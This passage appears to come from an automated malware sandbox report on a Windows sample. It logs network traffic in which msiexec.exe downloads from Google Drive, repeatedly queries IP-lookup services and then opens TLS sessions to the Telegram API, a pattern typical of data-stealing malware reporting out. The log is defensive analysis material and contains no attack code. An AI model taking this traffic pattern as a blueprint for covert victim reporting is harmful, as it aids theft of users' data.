                                                                                                                                                                          Dec 16, 2024 16:33:36.501763105 CET4982880192.168.2.4158.101.44.242
                                                                                                                                                                          Dec 16, 2024 16:33:37.668638945 CET44349831104.21.67.152192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:37.670658112 CET49831443192.168.2.4104.21.67.152
                                                                                                                                                                          Dec 16, 2024 16:33:37.670736074 CET44349831104.21.67.152192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:38.136502028 CET44349831104.21.67.152192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:38.136576891 CET44349831104.21.67.152192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:38.136642933 CET49831443192.168.2.4104.21.67.152
                                                                                                                                                                          Dec 16, 2024 16:33:38.137029886 CET49831443192.168.2.4104.21.67.152
                                                                                                                                                                          Dec 16, 2024 16:33:38.147361040 CET4982880192.168.2.4158.101.44.242
                                                                                                                                                                          Dec 16, 2024 16:33:38.149514914 CET4983580192.168.2.4158.101.44.242
                                                                                                                                                                          Dec 16, 2024 16:33:38.454901934 CET4982880192.168.2.4158.101.44.242
                                                                                                                                                                          Dec 16, 2024 16:33:38.559283972 CET8049835158.101.44.242192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:38.559345007 CET8049828158.101.44.242192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:38.559541941 CET4983580192.168.2.4158.101.44.242
                                                                                                                                                                          Dec 16, 2024 16:33:38.559593916 CET4982880192.168.2.4158.101.44.242
                                                                                                                                                                          Dec 16, 2024 16:33:38.559715986 CET4983580192.168.2.4158.101.44.242
                                                                                                                                                                          Dec 16, 2024 16:33:38.574919939 CET8049828158.101.44.242192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:38.679507971 CET8049835158.101.44.242192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:39.763645887 CET8049835158.101.44.242192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:39.764966011 CET49840443192.168.2.4104.21.67.152
                                                                                                                                                                          Dec 16, 2024 16:33:39.764996052 CET44349840104.21.67.152192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:39.765086889 CET49840443192.168.2.4104.21.67.152
                                                                                                                                                                          Dec 16, 2024 16:33:39.765444994 CET49840443192.168.2.4104.21.67.152
                                                                                                                                                                          Dec 16, 2024 16:33:39.765461922 CET44349840104.21.67.152192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:39.814147949 CET4983580192.168.2.4158.101.44.242
                                                                                                                                                                          Dec 16, 2024 16:33:40.999567032 CET44349840104.21.67.152192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:41.001509905 CET49840443192.168.2.4104.21.67.152
                                                                                                                                                                          Dec 16, 2024 16:33:41.001537085 CET44349840104.21.67.152192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:41.490715981 CET44349840104.21.67.152192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:41.490878105 CET44349840104.21.67.152192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:41.490947962 CET49840443192.168.2.4104.21.67.152
                                                                                                                                                                          Dec 16, 2024 16:33:41.491332054 CET49840443192.168.2.4104.21.67.152
                                                                                                                                                                          Dec 16, 2024 16:33:41.494661093 CET4983580192.168.2.4158.101.44.242
                                                                                                                                                                          Dec 16, 2024 16:33:41.495992899 CET4984280192.168.2.4158.101.44.242
                                                                                                                                                                          Dec 16, 2024 16:33:41.615540028 CET8049835158.101.44.242192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:41.615631104 CET4983580192.168.2.4158.101.44.242
                                                                                                                                                                          Dec 16, 2024 16:33:41.616233110 CET8049842158.101.44.242192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:41.616338015 CET4984280192.168.2.4158.101.44.242
                                                                                                                                                                          Dec 16, 2024 16:33:41.616498947 CET4984280192.168.2.4158.101.44.242
                                                                                                                                                                          Dec 16, 2024 16:33:41.736381054 CET8049842158.101.44.242192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:42.841303110 CET8049842158.101.44.242192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:42.843045950 CET49848443192.168.2.4104.21.67.152
                                                                                                                                                                          Dec 16, 2024 16:33:42.843090057 CET44349848104.21.67.152192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:42.843241930 CET49848443192.168.2.4104.21.67.152
                                                                                                                                                                          Dec 16, 2024 16:33:42.843518019 CET49848443192.168.2.4104.21.67.152
                                                                                                                                                                          Dec 16, 2024 16:33:42.843532085 CET44349848104.21.67.152192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:42.892412901 CET4984280192.168.2.4158.101.44.242
                                                                                                                                                                          Dec 16, 2024 16:33:44.394408941 CET44349848104.21.67.152192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:44.418366909 CET49848443192.168.2.4104.21.67.152
                                                                                                                                                                          Dec 16, 2024 16:33:44.418407917 CET44349848104.21.67.152192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:44.952824116 CET44349848104.21.67.152192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:44.952970982 CET44349848104.21.67.152192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:44.953022957 CET49848443192.168.2.4104.21.67.152
                                                                                                                                                                          Dec 16, 2024 16:33:44.953243017 CET49848443192.168.2.4104.21.67.152
                                                                                                                                                                          Dec 16, 2024 16:33:44.960304022 CET4984280192.168.2.4158.101.44.242
                                                                                                                                                                          Dec 16, 2024 16:33:44.961662054 CET4985380192.168.2.4158.101.44.242
                                                                                                                                                                          Dec 16, 2024 16:33:45.095797062 CET8049853158.101.44.242192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:45.095813036 CET8049842158.101.44.242192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:45.095916033 CET4985380192.168.2.4158.101.44.242
                                                                                                                                                                          Dec 16, 2024 16:33:45.095999956 CET4984280192.168.2.4158.101.44.242
                                                                                                                                                                          Dec 16, 2024 16:33:45.096046925 CET4985380192.168.2.4158.101.44.242
                                                                                                                                                                          Dec 16, 2024 16:33:45.215980053 CET8049853158.101.44.242192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:46.300425053 CET8049853158.101.44.242192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:46.301683903 CET49855443192.168.2.4104.21.67.152
                                                                                                                                                                          Dec 16, 2024 16:33:46.301776886 CET44349855104.21.67.152192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:46.302038908 CET49855443192.168.2.4104.21.67.152
                                                                                                                                                                          Dec 16, 2024 16:33:46.302228928 CET49855443192.168.2.4104.21.67.152
                                                                                                                                                                          Dec 16, 2024 16:33:46.302253008 CET44349855104.21.67.152192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:46.345386028 CET4985380192.168.2.4158.101.44.242
                                                                                                                                                                          Dec 16, 2024 16:33:47.546794891 CET44349855104.21.67.152192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:47.548983097 CET49855443192.168.2.4104.21.67.152
                                                                                                                                                                          Dec 16, 2024 16:33:47.549009085 CET44349855104.21.67.152192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:48.283477068 CET44349855104.21.67.152192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:48.283633947 CET44349855104.21.67.152192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:48.283699036 CET49855443192.168.2.4104.21.67.152
                                                                                                                                                                          Dec 16, 2024 16:33:48.284153938 CET49855443192.168.2.4104.21.67.152
                                                                                                                                                                          Dec 16, 2024 16:33:48.288374901 CET4985380192.168.2.4158.101.44.242
                                                                                                                                                                          Dec 16, 2024 16:33:48.289419889 CET4986180192.168.2.4158.101.44.242
                                                                                                                                                                          Dec 16, 2024 16:33:48.408875942 CET8049853158.101.44.242192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:48.409008980 CET4985380192.168.2.4158.101.44.242
                                                                                                                                                                          Dec 16, 2024 16:33:48.409272909 CET8049861158.101.44.242192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:48.409367085 CET4986180192.168.2.4158.101.44.242
                                                                                                                                                                          Dec 16, 2024 16:33:48.409517050 CET4986180192.168.2.4158.101.44.242
                                                                                                                                                                          Dec 16, 2024 16:33:48.531933069 CET8049861158.101.44.242192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:49.648853064 CET8049861158.101.44.242192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:49.650125027 CET49867443192.168.2.4104.21.67.152
                                                                                                                                                                          Dec 16, 2024 16:33:49.650191069 CET44349867104.21.67.152192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:49.650298119 CET49867443192.168.2.4104.21.67.152
                                                                                                                                                                          Dec 16, 2024 16:33:49.650473118 CET49867443192.168.2.4104.21.67.152
                                                                                                                                                                          Dec 16, 2024 16:33:49.650490999 CET44349867104.21.67.152192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:49.689426899 CET4986180192.168.2.4158.101.44.242
                                                                                                                                                                          Dec 16, 2024 16:33:50.878164053 CET44349867104.21.67.152192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:50.879951000 CET49867443192.168.2.4104.21.67.152
                                                                                                                                                                          Dec 16, 2024 16:33:50.880032063 CET44349867104.21.67.152192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:51.799140930 CET44349867104.21.67.152192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:51.799211979 CET44349867104.21.67.152192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:51.799262047 CET49867443192.168.2.4104.21.67.152
                                                                                                                                                                          Dec 16, 2024 16:33:51.799825907 CET49867443192.168.2.4104.21.67.152
                                                                                                                                                                          Dec 16, 2024 16:33:51.805660009 CET4986180192.168.2.4158.101.44.242
                                                                                                                                                                          Dec 16, 2024 16:33:51.806763887 CET4987080192.168.2.4158.101.44.242
                                                                                                                                                                          Dec 16, 2024 16:33:51.960170031 CET8049870158.101.44.242192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:51.960385084 CET8049861158.101.44.242192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:51.960462093 CET4987080192.168.2.4158.101.44.242
                                                                                                                                                                          Dec 16, 2024 16:33:51.961927891 CET4987080192.168.2.4158.101.44.242
                                                                                                                                                                          Dec 16, 2024 16:33:51.961927891 CET4986180192.168.2.4158.101.44.242
                                                                                                                                                                          Dec 16, 2024 16:33:52.082278967 CET8049870158.101.44.242192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:53.168433905 CET8049870158.101.44.242192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:53.169790983 CET49874443192.168.2.4104.21.67.152
                                                                                                                                                                          Dec 16, 2024 16:33:53.169909000 CET44349874104.21.67.152192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:53.170013905 CET49874443192.168.2.4104.21.67.152
                                                                                                                                                                          Dec 16, 2024 16:33:53.170283079 CET49874443192.168.2.4104.21.67.152
                                                                                                                                                                          Dec 16, 2024 16:33:53.170305014 CET44349874104.21.67.152192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:53.220477104 CET4987080192.168.2.4158.101.44.242
                                                                                                                                                                          Dec 16, 2024 16:33:54.517927885 CET44349874104.21.67.152192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:54.519454956 CET49874443192.168.2.4104.21.67.152
                                                                                                                                                                          Dec 16, 2024 16:33:54.519506931 CET44349874104.21.67.152192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:54.968799114 CET44349874104.21.67.152192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:54.968967915 CET44349874104.21.67.152192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:54.969099045 CET49874443192.168.2.4104.21.67.152
                                                                                                                                                                          Dec 16, 2024 16:33:54.969321012 CET49874443192.168.2.4104.21.67.152
                                                                                                                                                                          Dec 16, 2024 16:33:54.993555069 CET4987080192.168.2.4158.101.44.242
                                                                                                                                                                          Dec 16, 2024 16:33:55.113997936 CET8049870158.101.44.242192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:55.114095926 CET4987080192.168.2.4158.101.44.242
                                                                                                                                                                          Dec 16, 2024 16:33:55.132849932 CET49880443192.168.2.4149.154.167.220
                                                                                                                                                                          Dec 16, 2024 16:33:55.132942915 CET44349880149.154.167.220192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:55.133024931 CET49880443192.168.2.4149.154.167.220
                                                                                                                                                                          Dec 16, 2024 16:33:55.133421898 CET49880443192.168.2.4149.154.167.220
                                                                                                                                                                          Dec 16, 2024 16:33:55.133450985 CET44349880149.154.167.220192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:56.519758940 CET44349880149.154.167.220192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:56.520021915 CET49880443192.168.2.4149.154.167.220
                                                                                                                                                                          Dec 16, 2024 16:33:56.529232979 CET49880443192.168.2.4149.154.167.220
                                                                                                                                                                          Dec 16, 2024 16:33:56.529258013 CET44349880149.154.167.220192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:56.529671907 CET44349880149.154.167.220192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:56.579982042 CET49880443192.168.2.4149.154.167.220
                                                                                                                                                                          Dec 16, 2024 16:33:56.587297916 CET49880443192.168.2.4149.154.167.220
                                                                                                                                                                          Dec 16, 2024 16:33:56.631330967 CET44349880149.154.167.220192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:57.030190945 CET44349880149.154.167.220192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:57.030368090 CET44349880149.154.167.220192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:57.030592918 CET49880443192.168.2.4149.154.167.220
                                                                                                                                                                          Dec 16, 2024 16:33:57.032254934 CET49880443192.168.2.4149.154.167.220
                                                                                                                                                                          Dec 16, 2024 16:34:02.894747972 CET4981880192.168.2.4193.122.6.168
                                                                                                                                                                          Dec 16, 2024 16:34:03.093199968 CET49901443192.168.2.4149.154.167.220
                                                                                                                                                                          Dec 16, 2024 16:34:03.093245029 CET44349901149.154.167.220192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:34:03.093337059 CET49901443192.168.2.4149.154.167.220
                                                                                                                                                                          Dec 16, 2024 16:34:03.093575954 CET49901443192.168.2.4149.154.167.220
                                                                                                                                                                          Dec 16, 2024 16:34:03.093595982 CET44349901149.154.167.220192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:34:04.463536024 CET44349901149.154.167.220192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:34:04.465178013 CET49901443192.168.2.4149.154.167.220
                                                                                                                                                                          Dec 16, 2024 16:34:04.465245008 CET44349901149.154.167.220192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:34:04.465322018 CET49901443192.168.2.4149.154.167.220
                                                                                                                                                                          Dec 16, 2024 16:34:04.465343952 CET44349901149.154.167.220192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:34:05.167098999 CET44349901149.154.167.220192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:34:05.167296886 CET44349901149.154.167.220192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:34:05.167784929 CET49901443192.168.2.4149.154.167.220
                                                                                                                                                                          Dec 16, 2024 16:34:05.168756962 CET49901443192.168.2.4149.154.167.220
                                                                                                                                                                          Dec 16, 2024 16:34:06.695687056 CET49907443192.168.2.4149.154.167.220
                                                                                                                                                                          Dec 16, 2024 16:34:06.695779085 CET44349907149.154.167.220192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:34:06.695869923 CET49907443192.168.2.4149.154.167.220
                                                                                                                                                                          Dec 16, 2024 16:34:06.696078062 CET49907443192.168.2.4149.154.167.220
                                                                                                                                                                          Dec 16, 2024 16:34:06.696110964 CET44349907149.154.167.220192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:34:08.080616951 CET44349907149.154.167.220192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:34:08.082329035 CET49907443192.168.2.4149.154.167.220
                                                                                                                                                                          Dec 16, 2024 16:34:08.082398891 CET44349907149.154.167.220192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:34:08.082473040 CET49907443192.168.2.4149.154.167.220
                                                                                                                                                                          Dec 16, 2024 16:34:08.082496881 CET44349907149.154.167.220192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:34:08.695486069 CET44349907149.154.167.220192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:34:08.696957111 CET44349907149.154.167.220192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:34:08.697051048 CET49907443192.168.2.4149.154.167.220
                                                                                                                                                                          Dec 16, 2024 16:34:10.731851101 CET49907443192.168.2.4149.154.167.220

                                                                                                                                                                          UDP Packets

                                                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                          Dec 16, 2024 16:33:16.547719002 CET6128453192.168.2.41.1.1.1
                                                                                                                                                                          Dec 16, 2024 16:33:16.687407017 CET53612841.1.1.1192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:19.335721970 CET5790553192.168.2.41.1.1.1
                                                                                                                                                                          Dec 16, 2024 16:33:19.475506067 CET53579051.1.1.1192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:25.243374109 CET5888753192.168.2.41.1.1.1
                                                                                                                                                                          Dec 16, 2024 16:33:25.381164074 CET53588871.1.1.1192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:27.704869032 CET5237653192.168.2.41.1.1.1
                                                                                                                                                                          Dec 16, 2024 16:33:28.032845974 CET53523761.1.1.1192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:34.926011086 CET6440853192.168.2.41.1.1.1
                                                                                                                                                                          Dec 16, 2024 16:33:35.098680019 CET53644081.1.1.1192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:54.994133949 CET5512053192.168.2.41.1.1.1
                                                                                                                                                                          Dec 16, 2024 16:33:55.132142067 CET53551201.1.1.1192.168.2.4

                                                                                                                                                                          DNS Queries

                                                                                                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                          Dec 16, 2024 16:33:16.547719002 CET192.168.2.41.1.1.10x9136Standard query (0)drive.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                          Dec 16, 2024 16:33:19.335721970 CET192.168.2.41.1.1.10x5980Standard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                          Dec 16, 2024 16:33:25.243374109 CET192.168.2.41.1.1.10x5a05Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                                                                                          Dec 16, 2024 16:33:27.704869032 CET192.168.2.41.1.1.10x9efcStandard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                                                                                                          Dec 16, 2024 16:33:34.926011086 CET192.168.2.41.1.1.10xb3e3Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                                                                                          Dec 16, 2024 16:33:54.994133949 CET192.168.2.41.1.1.10xa3ceStandard query (0)api.telegram.orgA (IP address)IN (0x0001)false

                                                                                                                                                                          DNS Answers

                                                                                                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                          Dec 16, 2024 16:33:16.687407017 CET1.1.1.1192.168.2.40x9136No error (0)drive.google.com172.217.19.174A (IP address)IN (0x0001)false
                                                                                                                                                                          Dec 16, 2024 16:33:19.475506067 CET1.1.1.1192.168.2.40x5980No error (0)drive.usercontent.google.com142.250.181.97A (IP address)IN (0x0001)false
                                                                                                                                                                          Dec 16, 2024 16:33:25.381164074 CET1.1.1.1192.168.2.40x5a05No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                          Dec 16, 2024 16:33:25.381164074 CET1.1.1.1192.168.2.40x5a05No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                                                                                          Dec 16, 2024 16:33:25.381164074 CET1.1.1.1192.168.2.40x5a05No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                                                                                          Dec 16, 2024 16:33:25.381164074 CET1.1.1.1192.168.2.40x5a05No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                                                                                          Dec 16, 2024 16:33:25.381164074 CET1.1.1.1192.168.2.40x5a05No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                                                                                          Dec 16, 2024 16:33:25.381164074 CET1.1.1.1192.168.2.40x5a05No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                                                                                          Dec 16, 2024 16:33:28.032845974 CET1.1.1.1192.168.2.40x9efcNo error (0)reallyfreegeoip.org104.21.67.152A (IP address)IN (0x0001)false
                                                                                                                                                                          Dec 16, 2024 16:33:28.032845974 CET1.1.1.1192.168.2.40x9efcNo error (0)reallyfreegeoip.org172.67.177.134A (IP address)IN (0x0001)false
                                                                                                                                                                          Dec 16, 2024 16:33:35.098680019 CET1.1.1.1192.168.2.40xb3e3No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                          Dec 16, 2024 16:33:35.098680019 CET1.1.1.1192.168.2.40xb3e3No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                                                                                          Dec 16, 2024 16:33:35.098680019 CET1.1.1.1192.168.2.40xb3e3No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                                                                                          Dec 16, 2024 16:33:35.098680019 CET1.1.1.1192.168.2.40xb3e3No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                                                                                          Dec 16, 2024 16:33:35.098680019 CET1.1.1.1192.168.2.40xb3e3No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                                                                                          Dec 16, 2024 16:33:35.098680019 CET1.1.1.1192.168.2.40xb3e3No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                                                                                          Dec 16, 2024 16:33:55.132142067 CET1.1.1.1192.168.2.40xa3ceNo error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false

                                                                                                                                                                          HTTP Request Dependency Graph

                                                                                                                                                                          • drive.google.com
                                                                                                                                                                          • drive.usercontent.google.com
                                                                                                                                                                          • reallyfreegeoip.org
                                                                                                                                                                          • api.telegram.org
                                                                                                                                                                          • checkip.dyndns.org

                                                                                                                                                                          HTTP Packets

                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                          0192.168.2.449800193.122.6.168808000C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          Dec 16, 2024 16:33:25.506360054 CET151OUTGET / HTTP/1.1
                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                          Host: checkip.dyndns.org
                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                          Dec 16, 2024 16:33:26.778592110 CET321INHTTP/1.1 200 OK
                                                                                                                                                                          Date: Mon, 16 Dec 2024 15:33:26 GMT
                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                          Content-Length: 104
                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                          X-Request-ID: 6b22edee941efa853d0de5d1d41115cf
                                                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                                                                                          Dec 16, 2024 16:33:26.784601927 CET127OUTGET / HTTP/1.1
                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                          Host: checkip.dyndns.org
                                                                                                                                                                          Dec 16, 2024 16:33:27.192281008 CET321INHTTP/1.1 200 OK
                                                                                                                                                                          Date: Mon, 16 Dec 2024 15:33:26 GMT
                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                          Content-Length: 104
                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                          X-Request-ID: a6f7089706c748b41534aa7a96ff0d29
                                                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                                                                                          Dec 16, 2024 16:33:29.720519066 CET127OUTGET / HTTP/1.1
                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                          Host: checkip.dyndns.org
                                                                                                                                                                          Dec 16, 2024 16:33:30.131134033 CET321INHTTP/1.1 200 OK
                                                                                                                                                                          Date: Mon, 16 Dec 2024 15:33:29 GMT
                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                          Content-Length: 104
                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                          X-Request-ID: 2e72622e5db806f3d5e5a168721bb35e
                                                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                          1192.168.2.449818193.122.6.168808000C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          Dec 16, 2024 16:33:31.949470043 CET127OUTGET / HTTP/1.1
                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                          Host: checkip.dyndns.org
                                                                                                                                                                          Dec 16, 2024 16:33:33.218835115 CET321INHTTP/1.1 200 OK
                                                                                                                                                                          Date: Mon, 16 Dec 2024 15:33:33 GMT
                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                          Content-Length: 104
                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                          X-Request-ID: 30deb6c222204f570d7e102f29fd05bf
                                                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                          2192.168.2.449828158.101.44.242808000C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          Dec 16, 2024 16:33:35.223452091 CET151OUTGET / HTTP/1.1
                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                          Host: checkip.dyndns.org
                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                          Dec 16, 2024 16:33:36.447566032 CET321INHTTP/1.1 200 OK
